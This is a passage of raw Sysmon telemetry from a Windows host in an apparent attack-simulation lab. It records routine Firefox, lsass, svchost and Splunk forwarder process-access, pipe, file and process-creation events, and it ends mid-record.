10:51:25.485{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-0C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000287960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:25.485{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-0C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000287959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.422{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.407{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.407{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.391{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.391{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.360{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.360{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.328{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.313{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.313{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000287949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:25.313{C8EA50B7-11AC-6216-1705-000000003802}5396\chrome.2228.2.196168147C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000287948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:25.313{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.2.196168147C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000287947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.313{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+19e61d8|C:\Program Files\Mozilla Firefox\xul.dll+19e47fe|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000287946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:25.313{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.1.48319158C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000287945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.297{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.297{C8EA50B7-11AA-6216-1605-000000003802}22282412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+12204b|C:\Program Files\Mozilla Firefox\xul.dll+1205b3f|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000287943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:25.266{C8EA50B7-11AA-6216-1605-000000003802}2228\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000287942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.250{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.219{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.203{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=147C6C52C01496B00EF07CEC1CFF5991,SHA256=7F41E19BB89ABEC7798E1D7DCDC0B12E1532CA4E9F405E139F3D1A5860EFF7A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.203{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.172{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e23ae1|C:\Program Files\Mozilla Firefox\xul.dll+e22d2c|C:\Program Files\Mozilla Firefox\xul.dll+e2526d|C:\Program Files\Mozilla Firefox\xul.dll+c3009f|C:\Program Files\Mozilla Firefox\xul.dll+c2d435|C:\Program Files\Mozilla Firefox\xul.dll+278c1b|C:\Program Files\Mozilla Firefox\xul.dll+2787f1|C:\Program Files\Mozilla Firefox\xul.dll+f7a1af|C:\Program Files\Mozilla Firefox\xul.dll+17895e7|C:\Program Files\Mozilla Firefox\xul.dll+1787a03|C:\Program Files\Mozilla Firefox\xul.dll+c2f818|C:\Program Files\Mozilla Firefox\xul.dll+25dda1|C:\Program Files\Mozilla Firefox\xul.dll+34f4de|C:\Program Files\Mozilla Firefox\xul.dll+ccce66|C:\Program Files\Mozilla Firefox\xul.dll+1778103|C:\Program Files\Mozilla Firefox\xul.dll+170f378|C:\Program Files\Mozilla Firefox\xul.dll+16dc459|C:\Program Files\Mozilla Firefox\xul.dll+1bd3168|C:\Program Files\Mozilla Firefox\xul.dll+170f811 10341000x8000000000000000287937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.141{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+99a30f|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19e466f|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.078{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.078{C8EA50B7-11AA-6216-1605-000000003802}22282268C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Program Files\Mozilla Firefox\firefox.exe+30cfd|C:\Program Files\Mozilla Firefox\firefox.exe+2ff25|C:\Program Files\Mozilla Firefox\xul.dll+2052e4a|C:\Program Files\Mozilla Firefox\xul.dll+9962fe|C:\Program Files\Mozilla Firefox\xul.dll+9944b5|C:\Program Files\Mozilla Firefox\xul.dll+99b13e|C:\Program Files\Mozilla Firefox\xul.dll+83253d|C:\Program Files\Mozilla Firefox\xul.dll+168dd89|C:\Program Files\Mozilla Firefox\xul.dll+168c88a|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+8357fb|C:\Program Files\Mozilla Firefox\nss3.dll+68dc|C:\Program Files\Mozilla Firefox\nss3.dll+90731|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.078{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.078{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.078{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.078{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.088{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2228.1.483191580\1217589377" -childID 1 -isForBrowser -prefsHandle 2124 -prefMapHandle 2120 -prefsLen 343 -prefMapSize 251484 -jsInitHandle 976 -jsInitLen 279340 -parentBuildID 20220216172458 -appDir "C:\Program Files\Mozilla Firefox\browser" - 2228 "\\.\pipe\gecko-crash-server-pipe.2228" 2084 157e6497548 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32LowMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000287929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.078{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 